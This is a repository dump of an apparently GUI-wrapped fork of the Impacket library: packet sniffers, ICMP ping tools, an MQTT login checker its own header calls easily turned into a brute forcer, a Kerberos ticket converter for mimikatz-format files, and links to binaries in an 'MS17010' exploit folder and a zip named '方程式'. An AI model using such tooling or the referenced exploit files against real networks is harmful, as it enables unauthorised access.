https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/MS17010/xdvl-0.dll
--------------------------------------------------------------------------------
/impacket/examples/MS17010/zibe.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/MS17010/zibe.dll
--------------------------------------------------------------------------------
/impacket/examples/MS17010/zlib1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/MS17010/zlib1.dll
--------------------------------------------------------------------------------
/impacket/examples/esentutl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # ESE utility. Allows dumping catalog, pages and tables.
12 | #
13 | # Author:
14 | # Alberto Solino (@agsolino)
15 | #
16 | # Reference for:
17 | # Extensive Storage Engine (ese)
18 | #
19 |
20 | from __future__ import division
21 | from __future__ import print_function
22 | import sys
23 | import logging
24 | import argparse
25 |
26 | from impacket.examples import logger
27 | from impacket import version
28 | from impacket.ese import ESENT_DB
29 |
30 |
31 | def dumpPage(ese, pageNum):
32 | data = ese.getPage(pageNum)
33 | data.dump()
34 |
35 | def exportTable(ese, tableName):
36 | cursor = ese.openTable(tableName)
37 | if cursor is None:
38 | logging.error('Can"t get a cursor for table: %s' % tableName)
39 | return
40 |
41 | i = 1
42 | print("Table: %s" % tableName)
43 | while True:
44 | try:
45 | record = ese.getNextRow(cursor)
46 | except Exception:
47 | logging.debug('Exception:', exc_info=True)
48 | logging.error('Error while calling getNextRow(), trying the next one')
49 | continue
50 |
51 | if record is None:
52 | break
53 | print("*** %d" % i)
54 | for j in list(record.keys()):
55 | if record[j] is not None:
56 | print("%-30s: %r" % (j, record[j]))
57 | i += 1
58 |
59 | def main():
60 | print(version.BANNER)
61 | # Init the example's logger theme
62 | logger.init()
63 |
64 | parser = argparse.ArgumentParser(add_help = True, description = "Extensive Storage Engine utility. Allows dumping "
65 | "catalog, pages and tables.")
66 | parser.add_argument('databaseFile', action='store', help='ESE to open')
67 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
68 | parser.add_argument('-page', action='store', help='page to open')
69 |
70 | subparsers = parser.add_subparsers(help='actions', dest='action')
71 |
72 | # dump page
73 | dump_parser = subparsers.add_parser('dump', help='dumps an specific page')
74 | dump_parser.add_argument('-page', action='store', required=True, help='page to dump')
75 |
76 | # info page
77 | subparsers.add_parser('info', help='dumps the catalog info for the DB')
78 |
79 | # export page
80 | export_parser = subparsers.add_parser('export', help='dumps the catalog info for the DB')
81 | export_parser.add_argument('-table', action='store', required=True, help='table to dump')
82 |
83 | if len(sys.argv)==1:
84 | parser.print_help()
85 | sys.exit(1)
86 |
87 | options = parser.parse_args()
88 |
89 | if options.debug is True:
90 | logging.getLogger().setLevel(logging.DEBUG)
91 | # Print the Library's installation path
92 | logging.debug(version.getInstallationPath())
93 | else:
94 | logging.getLogger().setLevel(logging.INFO)
95 |
96 | ese = ESENT_DB(options.databaseFile)
97 |
98 | try:
99 | if options.action.upper() == 'INFO':
100 | ese.printCatalog()
101 | elif options.action.upper() == 'DUMP':
102 | dumpPage(ese, int(options.page))
103 | elif options.action.upper() == 'EXPORT':
104 | exportTable(ese, options.table)
105 | else:
106 | raise Exception('Unknown action %s ' % options.action)
107 | except Exception as e:
108 | if logging.getLogger().level == logging.DEBUG:
109 | import traceback
110 | traceback.print_exc()
111 | print(e)
112 | ese.close()
113 |
114 |
115 | if __name__ == '__main__':
116 | main()
117 | sys.exit(1)
118 |
--------------------------------------------------------------------------------
/impacket/examples/mqtt_check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple MQTT example aimed at playing with different login options. Can be converted into a account/password
12 | # brute forcer quite easily.
13 | #
14 | # Author:
15 | # Alberto Solino (@agsolino)
16 | #
17 | # Reference for:
18 | # MQTT and Structure
19 | #
20 |
21 | from __future__ import print_function
22 |
23 | import argparse
24 | import logging
25 | import sys
26 |
27 | from impacket import version
28 | from impacket.examples import logger
29 | from impacket.examples.utils import parse_target
30 | from impacket.mqtt import CONNECT_ACK_ERROR_MSGS, MQTTConnection
31 |
32 | class MQTT_LOGIN:
33 | def __init__(self, username, password, target, options):
34 | self._options = options
35 | self._username = username
36 | self._password = password
37 | self._target = target
38 |
39 | if self._username == '':
40 | self._username = None
41 |
42 | def run(self):
43 | mqtt = MQTTConnection(self._target, int(self._options.port), self._options.ssl)
44 |
45 | if self._options.client_id is None:
46 | clientId = ' '
47 | else:
48 | clientId = self._options.client_id
49 |
50 | mqtt.connect(clientId, self._username, self._password)
51 |
52 | logging.info(CONNECT_ACK_ERROR_MSGS[0])
53 |
54 | if __name__ == '__main__':
55 | # Init the example's logger theme
56 | logger.init()
57 | print(version.BANNER)
58 | parser = argparse.ArgumentParser(add_help=False,
59 | description="MQTT login check")
60 | parser.add_argument("--help", action="help", help='show this help message and exit')
61 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')
62 | parser.add_argument('-client-id', action='store', help='Client ID used when authenticating (default random)')
63 | parser.add_argument('-ssl', action='store_true', help='turn SSL on')
64 | parser.add_argument('-port', action='store', default='1883', help='port to connect to (default 1883)')
65 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
66 |
67 | try:
68 | options = parser.parse_args()
69 | except Exception as e:
70 | logging.error(str(e))
71 | sys.exit(1)
72 |
73 | if options.debug is True:
74 | logging.getLogger().setLevel(logging.DEBUG)
75 | # Print the Library's installation path
76 | logging.debug(version.getInstallationPath())
77 | else:
78 | logging.getLogger().setLevel(logging.INFO)
79 |
80 | domain, username, password, address = parse_target(options.target)
81 |
82 | check_mqtt = MQTT_LOGIN(username, password, address, options)
83 | try:
84 | check_mqtt.run()
85 | except Exception as e:
86 | if logging.getLogger().level == logging.DEBUG:
87 | import traceback
88 | traceback.print_exc()
89 | logging.error(e)
90 |
--------------------------------------------------------------------------------
/impacket/examples/mssqlinstance.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # [MC-SQLR] example. Retrieves the instances names from the target host
12 | #
13 | # Author:
14 | # Alberto Solino (@agsolino)
15 | #
16 | # Reference for:
17 | # Structure
18 | #
19 |
20 | from __future__ import division
21 | from __future__ import print_function
22 | import argparse
23 | import sys
24 | import logging
25 |
26 | from impacket.examples import logger
27 | from impacket import version, tds
28 |
29 | if __name__ == '__main__':
30 |
31 | print(version.BANNER)
32 | # Init the example's logger theme
33 | logger.init()
34 |
35 | parser = argparse.ArgumentParser(add_help = True, description = "Asks the remote host for its running MSSQL Instances.")
36 |
37 | parser.add_argument('host', action='store', help='target host')
38 | parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer')
39 |
40 | if len(sys.argv)==1:
41 | parser.print_help()
42 | sys.exit(1)
43 |
44 | options = parser.parse_args()
45 |
46 | ms_sql = tds.MSSQL(options.host)
47 | instances = ms_sql.getInstances(int(options.timeout))
48 | if len(instances) == 0:
49 | "No MSSQL Instances found"
50 | else:
51 | for i, instance in enumerate(instances):
52 | logging.info("Instance %d" % i)
53 | for key in list(instance.keys()):
54 | print(key + ":" + instance[key])
55 |
--------------------------------------------------------------------------------
/impacket/examples/ping.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple ICMP ping.
12 | #
13 | # This implementation of ping uses the ICMP echo and echo-reply packets
14 | # to check the status of a host. If the remote host is up, it should reply
15 | # to the echo probe with an echo-reply packet.
16 | # Note that this isn't a definite test, as in the case the remote host is up
17 | # but refuses to reply the probes.
18 | # Also note that the user must have special access to be able to open a raw
19 | # socket, which this program requires.
20 | #
21 | # Authors:
22 | # Gerardo Richarte (@gerasdf)
23 | # Javier Kohen
24 | #
25 | # Reference for:
26 | # ImpactPacket: IP, ICMP, DATA
27 | # ImpactDecoder
28 | #
29 |
30 | import select
31 | import socket
32 | import time
33 | import sys
34 |
35 | from impacket import ImpactDecoder, ImpactPacket
36 |
37 | if len(sys.argv) < 3:
38 | print("Use: %s " % sys.argv[0])
39 | sys.exit(1)
40 |
41 | src = sys.argv[1]
42 | dst = sys.argv[2]
43 |
44 | # Create a new IP packet and set its source and destination addresses.
45 |
46 | ip = ImpactPacket.IP()
47 | ip.set_ip_src(src)
48 | ip.set_ip_dst(dst)
49 |
50 | # Create a new ICMP packet of type ECHO.
51 |
52 | icmp = ImpactPacket.ICMP()
53 | icmp.set_icmp_type(icmp.ICMP_ECHO)
54 |
55 | # Include a 156-character long payload inside the ICMP packet.
56 | icmp.contains(ImpactPacket.Data(b"A"*156))
57 |
58 | # Have the IP packet contain the ICMP packet (along with its payload).
59 | ip.contains(icmp)
60 |
61 | # Open a raw socket. Special permissions are usually required.
62 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
63 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
64 |
65 | seq_id = 0
66 | while 1:
67 | # Give the ICMP packet the next ID in the sequence.
68 | seq_id += 1
69 | icmp.set_icmp_id(seq_id)
70 |
71 | # Calculate its checksum.
72 | icmp.set_icmp_cksum(0)
73 | icmp.auto_checksum = 1
74 |
75 | # Send it to the target host.
76 | s.sendto(ip.get_packet(), (dst, 0))
77 |
78 | # Wait for incoming replies.
79 | if s in select.select([s], [], [], 1)[0]:
80 | reply = s.recvfrom(2000)[0]
81 |
82 | # Use ImpactDecoder to reconstruct the packet hierarchy.
83 | rip = ImpactDecoder.IPDecoder().decode(reply)
84 | # Extract the ICMP packet from its container (the IP packet).
85 | ricmp = rip.child()
86 |
87 | # If the packet matches, report it to the user.
88 | if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type():
89 | print("Ping reply for sequence #%d" % ricmp.get_icmp_id())
90 |
91 | time.sleep(1)
92 |
--------------------------------------------------------------------------------
/impacket/examples/ping6.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple ICMP6 ping.
12 | #
13 | # This implementation of ping uses the ICMP echo and echo-reply packets
14 | # to check the status of a host. If the remote host is up, it should reply
15 | # to the echo probe with an echo-reply packet.
16 | # Note that this isn't a definite test, as in the case the remote host is up
17 | # but refuses to reply the probes.
18 | # Also note that the user must have special access to be able to open a raw
19 | # socket, which this program requires.
20 | #
21 | # Authors:
22 | # Alberto Solino (@agsolino)
23 | #
24 | # Reference for:
25 | # ImpactPacket: ICMP6
26 | # ImpactDecoder
27 | #
28 |
29 | import select
30 | import socket
31 | import time
32 | import sys
33 |
34 | from impacket import ImpactDecoder, IP6, ICMP6, version
35 |
36 | print(version.BANNER)
37 |
38 | if len(sys.argv) < 3:
39 | print("Use: %s " % sys.argv[0])
40 | sys.exit(1)
41 |
42 | src = sys.argv[1]
43 | dst = sys.argv[2]
44 |
45 | # Create a new IP packet and set its source and destination addresses.
46 |
47 | ip = IP6.IP6()
48 | ip.set_ip_src(src)
49 | ip.set_ip_dst(dst)
50 | ip.set_traffic_class(0)
51 | ip.set_flow_label(0)
52 | ip.set_hop_limit(64)
53 |
54 | # Open a raw socket. Special permissions are usually required.
55 | s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
56 |
57 | payload = b"A"*156
58 |
59 | print("PING %s %d data bytes" % (dst, len(payload)))
60 | seq_id = 0
61 | while 1:
62 | # Give the ICMP packet the next ID in the sequence.
63 | seq_id += 1
64 | icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload)
65 |
66 | # Have the IP packet contain the ICMP packet (along with its payload).
67 | ip.contains(icmp)
68 | ip.set_next_header(ip.child().get_ip_protocol_number())
69 | ip.set_payload_length(ip.child().get_size())
70 | icmp.calculate_checksum()
71 |
72 | # Send it to the target host.
73 | s.sendto(icmp.get_packet(), (dst, 0))
74 |
75 | # Wait for incoming replies.
76 | if s in select.select([s], [], [], 1)[0]:
77 | reply = s.recvfrom(2000)[0]
78 |
79 | # Use ImpactDecoder to reconstruct the packet hierarchy.
80 | rip = ImpactDecoder.ICMP6Decoder().decode(reply)
81 |
82 | # If the packet matches, report it to the user.
83 | if ICMP6.ICMP6.ECHO_REPLY == rip.get_type():
84 | print("%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4, dst, rip.get_echo_sequence_number()))
85 |
86 | time.sleep(1)
87 |
--------------------------------------------------------------------------------
/impacket/examples/sniff.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple packet sniffer.
12 | #
13 | # This packet sniffer uses the pcap library to listen for packets in
14 | # transit over the specified interface. The returned packages can be
15 | # filtered according to a BPF filter (see tcpdump(3) for further
16 | # information on BPF filters).
17 | #
18 | # Note that the user might need special permissions to be able to use pcap.
19 | #
20 | # Authors:
21 | # Maximiliano Caceres
22 | # Javier Kohen
23 | #
24 | # Reference for:
25 | # pcapy: findalldevs, open_live
26 | # ImpactDecoder
27 | #
28 |
29 | import sys
30 | from threading import Thread
31 | import pcapy
32 | from pcapy import findalldevs, open_live
33 |
34 | from impacket.ImpactDecoder import EthDecoder, LinuxSLLDecoder
35 |
36 |
37 | class DecoderThread(Thread):
38 | def __init__(self, pcapObj):
39 | # Query the type of the link and instantiate a decoder accordingly.
40 | datalink = pcapObj.datalink()
41 | if pcapy.DLT_EN10MB == datalink:
42 | self.decoder = EthDecoder()
43 | elif pcapy.DLT_LINUX_SLL == datalink:
44 | self.decoder = LinuxSLLDecoder()
45 | else:
46 | raise Exception("Datalink type not supported: " % datalink)
47 |
48 | self.pcap = pcapObj
49 | Thread.__init__(self)
50 |
51 | def run(self):
52 | # Sniff ad infinitum.
53 | # PacketHandler shall be invoked by pcap for every packet.
54 | self.pcap.loop(0, self.packetHandler)
55 |
56 | def packetHandler(self, hdr, data):
57 | # Use the ImpactDecoder to turn the rawpacket into a hierarchy
58 | # of ImpactPacket instances.
59 | # Display the packet in human-readable form.
60 | print(self.decoder.decode(data))
61 |
62 |
63 | def getInterface():
64 | # Grab a list of interfaces that pcap is able to listen on.
65 | # The current user will be able to listen from all returned interfaces,
66 | # using open_live to open them.
67 | ifs = findalldevs()
68 |
69 | # No interfaces available, abort.
70 | if 0 == len(ifs):
71 | print("You don't have enough permissions to open any interface on this system.")
72 | sys.exit(1)
73 |
74 | # Only one interface available, use it.
75 | elif 1 == len(ifs):
76 | print('Only one interface present, defaulting to it.')
77 | return ifs[0]
78 |
79 | # Ask the user to choose an interface from the list.
80 | count = 0
81 | for iface in ifs:
82 | print('%i - %s' % (count, iface))
83 | count += 1
84 | idx = int(input('Please select an interface: '))
85 |
86 | return ifs[idx]
87 |
88 | def main(filter):
89 | dev = getInterface()
90 |
91 | # Open interface for catpuring.
92 | p = open_live(dev, 1500, 0, 100)
93 |
94 | # Set the BPF filter. See tcpdump(3).
95 | p.setfilter(filter)
96 |
97 | print("Listening on %s: net=%s, mask=%s, linktype=%d" % (dev, p.getnet(), p.getmask(), p.datalink()))
98 |
99 | # Start sniffing thread and finish main thread.
100 | DecoderThread(p).start()
101 |
102 | # Process command-line arguments. Take everything as a BPF filter to pass
103 | # onto pcap. Default to the empty filter (match all).
104 | filter = ''
105 | if len(sys.argv) > 1:
106 | filter = ' '.join(sys.argv[1:])
107 |
108 | main(filter)
109 |
--------------------------------------------------------------------------------
/impacket/examples/sniffer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Simple packet sniffer.
12 | #
13 | # This packet sniffer uses a raw socket to listen for packets
14 | # in transit corresponding to the specified protocols.
15 | #
16 | # Note that the user might need special permissions to be able to use
17 | # raw sockets.
18 | #
19 | # Authors:
20 | # Gerardo Richarte (@gerasdf)
21 | # Javier Kohen
22 | #
23 | # Reference for:
24 | # ImpactDecoder
25 | #
26 |
27 | from select import select
28 | import socket
29 | import sys
30 |
31 | from impacket import ImpactDecoder
32 |
33 | DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp')
34 |
35 | if len(sys.argv) == 1:
36 | toListen = DEFAULT_PROTOCOLS
37 | print("Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ..." % sys.argv[0])
38 | else:
39 | toListen = sys.argv[1:]
40 |
41 | # Open one socket for each specified protocol.
42 | # A special option is set on the socket so that IP headers are included with
43 | # the returned data.
44 | sockets = []
45 | for protocol in toListen:
46 | try:
47 | protocol_num = socket.getprotobyname(protocol)
48 | except socket.error:
49 | print("Ignoring unknown protocol:", protocol)
50 | toListen.remove(protocol)
51 | continue
52 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num)
53 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
54 | sockets.append(s)
55 |
56 | if 0 == len(toListen):
57 | print("There are no protocols available.")
58 | sys.exit(0)
59 |
60 | print("Listening on protocols:", toListen)
61 |
62 | # Instantiate an IP packets decoder.
63 | # As all the packets include their IP header, that decoder only is enough.
64 | decoder = ImpactDecoder.IPDecoder()
65 |
66 | while len(sockets) > 0:
67 | # Wait for an incoming packet on any socket.
68 | ready = select(sockets, [], [])[0]
69 | for s in ready:
70 | packet = s.recvfrom(4096)[0]
71 | if 0 == len(packet):
72 | # Socket remotely closed. Discard it.
73 | sockets.remove(s)
74 | s.close()
75 | else:
76 | # Packet received. Decode and display it.
77 | packet = decoder.decode(packet)
78 | print(packet)
79 |
--------------------------------------------------------------------------------
/impacket/examples/ticketConverter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # This script will convert kirbi files (commonly used by mimikatz) into ccache files used by impacket,
12 | # and vice versa.
13 | #
14 | # Examples:
15 | # ./ticket_converter.py admin.ccache admin.kirbi
16 | # ./ticket_converter.py admin.kirbi admin.ccache
17 | #
18 | # Author:
19 | # Zer1t0 (https://github.com/Zer1t0)
20 | #
21 | # References:
22 | # - https://tools.ietf.org/html/rfc4120
23 | # - http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html
24 | # - https://github.com/gentilkiwi/kekeo
25 | # - https://github.com/rvazarkar/KrbCredExport
26 | #
27 |
28 | import argparse
29 | import struct
30 |
31 | from impacket import version
32 | from impacket.krb5.ccache import CCache
33 |
34 |
35 | def parse_args():
36 | parser = argparse.ArgumentParser()
37 | parser.add_argument('input_file', help="File in kirbi (KRB-CRED) or ccache format")
38 | parser.add_argument('output_file', help="Output file")
39 | return parser.parse_args()
40 |
41 |
42 | def main():
43 | print(version.BANNER)
44 |
45 | args = parse_args()
46 |
47 | if is_kirbi_file(args.input_file):
48 | print('[*] converting kirbi to ccache...')
49 | convert_kirbi_to_ccache(args.input_file, args.output_file)
50 | print('[+] done')
51 | elif is_ccache_file(args.input_file):
52 | print('[*] converting ccache to kirbi...')
53 | convert_ccache_to_kirbi(args.input_file, args.output_file)
54 | print('[+] done')
55 | else:
56 | print('[X] unknown file format')
57 |
58 |
59 | def is_kirbi_file(filename):
60 | with open(filename, 'rb') as fi:
61 | fileid = struct.unpack(">B", fi.read(1))[0]
62 | return fileid == 0x76
63 |
64 |
65 | def is_ccache_file(filename):
66 | with open(filename, 'rb') as fi:
67 | fileid = struct.unpack(">B", fi.read(1))[0]
68 | return fileid == 0x5
69 |
70 |
71 | def convert_kirbi_to_ccache(input_filename, output_filename):
72 | ccache = CCache.loadKirbiFile(input_filename)
73 | ccache.saveFile(output_filename)
74 |
75 |
76 | def convert_ccache_to_kirbi(input_filename, output_filename):
77 | ccache = CCache.loadFile(input_filename)
78 | ccache.saveKirbiFile(output_filename)
79 |
80 |
81 | if __name__ == '__main__':
82 | main()
83 |
--------------------------------------------------------------------------------
/impacket/examples/方程式.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/examples/方程式.zip
--------------------------------------------------------------------------------
/impacket/impacket.egg-info/dependency_links.txt:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/impacket/impacket.egg-info/requires.txt:
--------------------------------------------------------------------------------
1 | charset_normalizer
2 | dsinternals
3 | flask>=1.0
4 | future
5 | ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5
6 | ldapdomaindump>=0.9.0
7 | pyOpenSSL>=21.0.0
8 | pyasn1>=0.2.3
9 | pycryptodomex
10 | six
11 |
12 | [pyreadline:sys_platform=="win32"]
13 |
--------------------------------------------------------------------------------
/impacket/impacket.egg-info/top_level.txt:
--------------------------------------------------------------------------------
1 | impacket
2 |
--------------------------------------------------------------------------------
/impacket/impacket/Dot11Crypto.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IEEE 802.11 Network packet codecs.
11 | #
12 | # Author:
13 | # Gustavo Moreira
14 | #
15 |
16 | class RC4():
17 | def __init__(self, key):
18 | bkey = bytearray(key)
19 | j = 0
20 | self.state = bytearray(range(256))
21 | for i in range(256):
22 | j = (j + self.state[i] + bkey[i % len(key)]) & 0xff
23 | self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j)
24 |
25 | def encrypt(self, data):
26 | i = j = 0
27 | out=bytearray()
28 | for char in bytearray(data):
29 | i = (i+1) & 0xff
30 | j = (j+self.state[i]) & 0xff
31 | self.state[i],self.state[j] = self.state[j],self.state[i] # SSWAP(i,j)
32 | out.append(char ^ self.state[(self.state[i] + self.state[j]) & 0xff])
33 |
34 | return bytes(out)
35 |
36 | def decrypt(self, data):
37 | # It's symmetric
38 | return self.encrypt(data)
39 |
--------------------------------------------------------------------------------
/impacket/impacket/Dot11KeyManager.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IEEE 802.11 Network packet codecs.
11 | #
12 | # Author:
13 | # Gustavo Moreira
14 |
15 | from array import array
16 | class KeyManager:
17 | def __init__(self):
18 | self.keys = {}
19 |
20 | def __get_bssid_hasheable_type(self, bssid):
21 | # List is an unhashable type
22 | if not isinstance(bssid, (list,tuple,array)):
23 | raise Exception('BSSID datatype must be a tuple, list or array')
24 | return tuple(bssid)
25 |
26 | def add_key(self, bssid, key):
27 | bssid=self.__get_bssid_hasheable_type(bssid)
28 | if bssid not in self.keys:
29 | self.keys[bssid] = key
30 | return True
31 | else:
32 | return False
33 |
34 | def replace_key(self, bssid, key):
35 | bssid=self.__get_bssid_hasheable_type(bssid)
36 | self.keys[bssid] = key
37 |
38 | return True
39 |
40 | def get_key(self, bssid):
41 | bssid=self.__get_bssid_hasheable_type(bssid)
42 | if bssid in self.keys:
43 | return self.keys[bssid]
44 | else:
45 | return False
46 |
47 | def delete_key(self, bssid):
48 | bssid=self.__get_bssid_hasheable_type(bssid)
49 | if not isinstance(bssid, list):
50 | raise Exception('BSSID datatype must be a list')
51 |
52 | if bssid in self.keys:
53 | del self.keys[bssid]
54 | return True
55 |
56 | return False
57 |
--------------------------------------------------------------------------------
/impacket/impacket/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Author:
10 | # Alberto Solino (@agsolino)
11 | #
12 |
13 | # Set default logging handler to avoid "No handler found" warnings.
14 | import logging
15 | try: # Python 2.7+
16 | from logging import NullHandler
17 | except ImportError:
18 | class NullHandler(logging.Handler):
19 | def emit(self, record):
20 | pass
21 |
22 | # All modules inside this library MUST use this logger (impacket)
23 | # It is up to the library consumer to do whatever is wanted
24 | # with the logger output. By default it is forwarded to the
25 | # upstream logger
26 |
27 | LOG = logging.getLogger(__name__)
28 | LOG.addHandler(NullHandler())
29 |
--------------------------------------------------------------------------------
/impacket/impacket/dcerpc/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/dcerpc/v5/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/dcerpc/v5/dcom/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/eap.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # EAP packets
11 | #
12 | # Author:
13 | # Aureliano Calvo
14 | #
15 |
16 | from impacket.helper import ProtocolPacket, Byte, Word, Long, ThreeBytesBigEndian
17 |
18 | DOT1X_AUTHENTICATION = 0x888E
19 |
20 | class EAPExpanded(ProtocolPacket):
21 | """EAP expanded data according to RFC 3748, section 5.7"""
22 |
23 | WFA_SMI = 0x00372a
24 | SIMPLE_CONFIG = 0x00000001
25 |
26 | header_size = 7
27 | tail_size = 0
28 |
29 | vendor_id = ThreeBytesBigEndian(0)
30 | vendor_type = Long(3, ">")
31 |
32 | class EAPR(ProtocolPacket):
33 | """It represents a request or a response in EAP (codes 1 and 2)"""
34 |
35 | IDENTITY = 0x01
36 | EXPANDED = 0xfe
37 |
38 | header_size = 1
39 | tail_size = 0
40 |
41 | type = Byte(0)
42 |
43 | class EAP(ProtocolPacket):
44 | REQUEST = 0x01
45 | RESPONSE = 0x02
46 | SUCCESS = 0x03
47 | FAILURE = 0x04
48 |
49 | header_size = 4
50 | tail_size = 0
51 |
52 | code = Byte(0)
53 | identifier = Byte(1)
54 | length = Word(2, ">")
55 |
56 | class EAPOL(ProtocolPacket):
57 | EAP_PACKET = 0x00
58 | EAPOL_START = 0x01
59 | EAPOL_LOGOFF = 0x02
60 | EAPOL_KEY = 0x03
61 | EAPOL_ENCAPSULATED_ASF_ALERT = 0x04
62 |
63 | DOT1X_VERSION = 0x01
64 |
65 | header_size = 4
66 | tail_size = 0
67 |
68 | version = Byte(0)
69 | packet_type = Byte(1)
70 | body_length = Word(2, ">")
71 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
